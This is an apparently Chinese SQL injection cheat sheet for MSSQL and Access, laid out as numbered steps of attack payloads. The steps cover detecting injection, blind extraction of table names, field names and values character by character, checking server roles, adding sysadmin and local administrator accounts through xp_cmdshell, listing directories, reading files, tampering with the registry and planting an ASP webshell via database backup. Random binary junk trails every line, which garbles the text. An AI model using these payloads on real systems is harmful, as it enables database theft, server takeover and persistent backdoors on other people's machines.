1.判断是否有注入;and 1=1 ;and 1=2 �Ok6Y&#'P
2.初步判断是否是mssql ;and user>0 �&nn.h@zje
%4L|#�^7�:
3.注入参数是字符'and [查询条件] and ''=' ���^B&� Z
U)p�2PT�fB
4.搜索时没过滤参数的'and [查询条件] and '%25'=' {dj�OU
9�]
oT�|E�\wj�
5.判断数据库系统 z�<<` 1wqg
3Ua��g[ms�
;and (select count(*) from sysobjects)>0 mssql BJj~fNm1Zr
3 Xf�XMVm
;and (select count(*) from msysobjects)>0 access }�C#YR(��]
mk�4��%]t"
jd2Fh)��:q
4kg9���R^0
6.猜数据库 ;and (select Count(*) from [数据库名])>0 jgbw'BB�u�
rP`\��<}a.
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �u>�S&?X'a
� ]NAPvw#p
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 GN1cnM>�`�
X\�%]�,"9%
9.(1)猜字段的ascii值(access) {b<�8Z*4�W
)X^nzhZ2O"
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �ydns_��Z�
#�����zy,x
(2)猜字段的ascii值(mssql) _-8,}F}W#s
g��'Xl>q��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �c=
�a�+7>
C#I),LE|d{
10.测试权限结构(mssql) �Z^fF^3x�
m'q�M�cC�E
:z���a!!^�
{�J0�^S��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- //+�UQgl�6
(�`!|
Uf$
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +&?VA!}.�
�sa#"@j)��
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- NOS��5bm&-
@ ~��sp�:l
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- >M1/m=a��
II<<-Y�6�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- �fRa1m?�%s
p[uwG31IL`
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �J)fS2Ni+�
D�9L�wYftZ
;and 1=(select IS_MEMBER('db_owner'));-- <m(nZ'Zqz2
r\3In-(AT
F}01ikXDb'
�<aHK{�*'3
11.添加mssql和系统的帐户 2h����u6��
y~luuV;�uj
;exec master.dbo.sp_addlogin username;-- @W �@�L%<�
;exec master.dbo.sp_password null,username,password;-- g{�J�3Ba�
�B�)-S@.�u
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- T]�v�D ,I+
'[�-/X�a['
;exec master.dbo.xp_cmdshell 'net user username password _>�`0!�mG�
�yQx��>h6�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �,���!Hl@(
#S�qOJX�~Q
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �9x�KFX|*$
X�W#4C*5?d
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Lw#h�nLI.�
J�`mp8?;%
e.j�gV=dT-
!�J�71[4t�
12.(1)遍历目录 p~mB;p�Z%;
WWO� j�y�j
;create table dirs(paths varchar(100), id int) TRq~�n7Y7C
�!c&^b@
yw
;insert dirs exec master.dbo.xp_dirtree 'c:\' *"4<&�F
�S
Rxli;bl�zi
;and (select top 1 paths from dirs)>0 U=y����D�!
0?:Z�ER��v
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ���]�t�=>#
u�3ZG;yk�M
x��xiLi46/
���'RA[_�Z
(2)遍历目录 =0:hrg+Zgx
~xJ�D�3Qf�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��E+2y-B)E
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Z�~�nl{P#�
�};�+�s0:H
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �8r|L�FuI�
�<^~F~]wnH
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 5�Ci}w|c/>
@E)XT\�;�3
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �^��$L/Mv+
W[?B@�sdSZ
�)5t�_tP�v
Qp�c�{7#bp
13.mssql中的存储过程 *=
71�/�&B
MJ��C
Yi<D
xp_regenumvalues 注册表根键, 子键 �+ mcN6/�
�2
g8PU$T
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 o�D���8-I^
OiO�L�4}5(
xp_regread 根键,子键,键值名 %x� *f{(8h
@3@�%9E�
;exec xp_regread gky_]7A��v
'��I�P!)DS
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 5a`}DTB[Co
|}}�]&:w�2
xp_regwrite 根键,子键, 值名, 值类型, 值 btY�Pp�0o~
+�?<jSmGW
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 g\.N>P@Bu�
��v\��ox:C
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 Gs6�#aL}]R
: I)G���v�
xp_regdeletevalue 根键,子键,值名 �S+p�P!�YX
<m�1sSgh�g
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 �045\i[�l=
y�m��k��R!
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 x~Agm_Tu+'
6RP�+4��c�
n�1?}Xq|�
}P.���K2ku
14.mssql的backup创建webshell ph#e�fY`a:
nuxd S�,�
use model �i6PE6>
1/
��_>i|s|aW
create table cmd(str image); QT�;V�a#a
1L�y��T�7h
insert into cmd(str) values (''); @'HT;Q!\Vd
xE1rxPuq)d
backup database model to disk='c:\l.asp'; k(v�"B�@0
�u�S-3\��$
6F-�JK�1i�
J�[�r^T&�o
15.mssql内置函数 <A�{y�($�
pn��s���+y
;and (select @@version)>0 获得Windows的版本号 E*^�9�|Y[�
SUc6/�'Rdr
;and user_name()='dbo' 判断当前系统的连接用户是不是sa `Hd9�\;N�J
s�X5s��L��
;and (select user_name())>0 爆当前系统的连接用户 IXJ6PpQ�Lv
HL8(l�P�gS
;and (select db_name())>0 得到当前连接的数据库 5��H���*�>
�h��~f�WE�
uP Rl[tS�0
/�n��8�psj
16.简洁的webshell pg!`S�x�FD
1�I
\t��u
use model y��LB~P�7K
`oVB!e�apl
create table cmd(str image); Rn;VP:H��M
]?#
#))RUS
insert into cmd(str) values (''); gDv�$D�B8-
-� `4Ty*�K
backup database model to disk='g:\wwwtest\l.asp';
